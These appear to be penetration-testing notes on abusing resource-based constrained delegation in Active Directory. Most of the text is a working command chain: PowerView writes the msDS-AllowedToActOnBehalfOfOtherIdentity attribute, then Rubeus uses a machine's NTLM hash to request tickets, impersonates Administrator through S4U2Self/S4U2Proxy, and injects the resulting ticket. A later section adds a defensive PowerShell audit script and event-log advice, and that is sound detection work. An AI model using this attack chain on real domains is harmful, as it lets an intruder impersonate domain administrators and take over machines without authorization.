Resource-Based Constrained Delegation (RBCD) is a Kerberos delegation feature in which the resource itself decides which other accounts may impersonate users to it; the trust is stored on the resource's own msDS-AllowedToActOnBehalfOfOtherIdentity attribute (e.g., ComputerA allows ComputerB to impersonate any user and authenticate to ComputerA as that user).
To exploit RBCD you need the following prerequisites:
Control over a user or computer account that has an SPN (ComputerA or UserA)
Permission to modify the msDS-AllowedToActOnBehalfOfOtherIdentity attribute on ComputerB (the target computer you want to access)
Exploit
Scenario
You control ComputerA and a domain user account, ducky, who has WriteProperty permissions on ComputerB.
The goal is to make ComputerB trust ComputerA for delegation, so that a service ticket (ST) for ducky -> ComputerA (obtained via S4U2Self) can be used in S4U2Proxy to obtain an ST for ducky -> ComputerB.
## Get SID of ComputerA
Get-DomainComputer -Identity ComputerA -Properties objectSid
## Build the raw binary value for msDS-AllowedToActOnBehalfOfOtherIdentity
## using ComputerA's SID
$rsd = New-Object Security.AccessControl.RawSecurityDescriptor "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;[ComputerA's SID])"
$rsdb = New-Object byte[] ($rsd.BinaryLength)
$rsd.GetBinaryForm($rsdb, 0)
## Write the msDS-AllowedToActOnBehalfOfOtherIdentity attribute onto ComputerB
Get-DomainComputer -Identity "ComputerB" | Set-DomainObject -Set @{'msDS-AllowedToActOnBehalfOfOtherIdentity' = $rsdb}
## Read the msDS-AllowedToActOnBehalfOfOtherIdentity attribute to confirm it
Get-DomainComputer -Identity "ComputerB" -Properties msDS-AllowedToActOnBehalfOfOtherIdentity
## Request TGT for ComputerA$
Rubeus.exe asktgt /user:ComputerA$ /rc4:[NTLM password hash for ComputerA] /nowrap
## S4U2Self and S4U2Proxy to get ST as Administrator for ComputerB
Rubeus.exe s4u /user:ComputerA$ /impersonateuser:Administrator /msdsspn:cifs/ComputerB.weelee.zip /ticket:[ComputerA TGT] /nowrap
## Inject the newly obtained ST as Administrator for ComputerB into a new process
Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:[domain] /username:Administrator /password:AnyPassword /ticket:[ComputerB ST]
## Use a tool such as SharpImpersonation to impersonate the process created above
Invoke-SharpImpersonation -Command "pid:[pid]"
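The attribute write in the steps above is what a defender should be sweeping for. The following is an added audit script, not part of the original notes: it uses the RSAT ActiveDirectory module to list every computer whose msDS-AllowedToActOnBehalfOfOtherIdentity is populated and decodes the descriptor with the same RawSecurityDescriptor class the notes use to build it; the function names are my own and it assumes a domain-joined host with read access to computer objects.

```powershell
# Added audit example (not from the original notes). Requires the RSAT ActiveDirectory
# module; function names are illustrative. Lists every computer that has RBCD
# configured and which principals its descriptor allows to act on its behalf.
Import-Module ActiveDirectory

function Convert-RbcdDescriptor {
    # $Raw is byte[] when read via PowerView/ADSI, or an ActiveDirectorySecurity
    # object when read via the AD module; normalise both to the binary form.
    param([Parameter(Mandatory)] $Raw)

    if ($Raw -is [System.DirectoryServices.ActiveDirectorySecurity]) {
        $bytes = $Raw.GetSecurityDescriptorBinaryForm()
    } else {
        $bytes = [byte[]]$Raw
    }
    $sd = [System.Security.AccessControl.RawSecurityDescriptor]::new($bytes, 0)

    foreach ($ace in $sd.DiscretionaryAcl) {
        $sid = $ace.SecurityIdentifier
        try   { $name = $sid.Translate([System.Security.Principal.NTAccount]).Value }
        catch { $name = '<unresolved>' }   # deleted or foreign SID: still review it
        [pscustomobject]@{
            Principal  = $name
            SID        = $sid.Value
            AceType    = $ace.AceType
            AccessMask = ('0x{0:X}' -f $ace.AccessMask)
        }
    }
}

function Get-RbcdTrusts {
    # Only objects where the attribute is set at all come back from this filter.
    $computers = Get-ADComputer -LDAPFilter '(msDS-AllowedToActOnBehalfOfOtherIdentity=*)' `
                                -Properties msDS-AllowedToActOnBehalfOfOtherIdentity
    foreach ($c in $computers) {
        Convert-RbcdDescriptor -Raw $c.'msDS-AllowedToActOnBehalfOfOtherIdentity' |
            ForEach-Object {
                $_ | Add-Member -NotePropertyName Resource -NotePropertyValue $c.Name -PassThru
            }
    }
}

# Report: every (resource, principal) pair; anything unexpected is a finding.
Get-RbcdTrusts | Sort-Object Resource, Principal | Format-Table Resource, Principal, SID, AceType, AccessMask -AutoSize
```

Writes to this attribute are also logged as Directory Service event 5136 when object-change auditing and a matching SACL on computer objects are enabled, which complements this periodic sweep with a real-time signal.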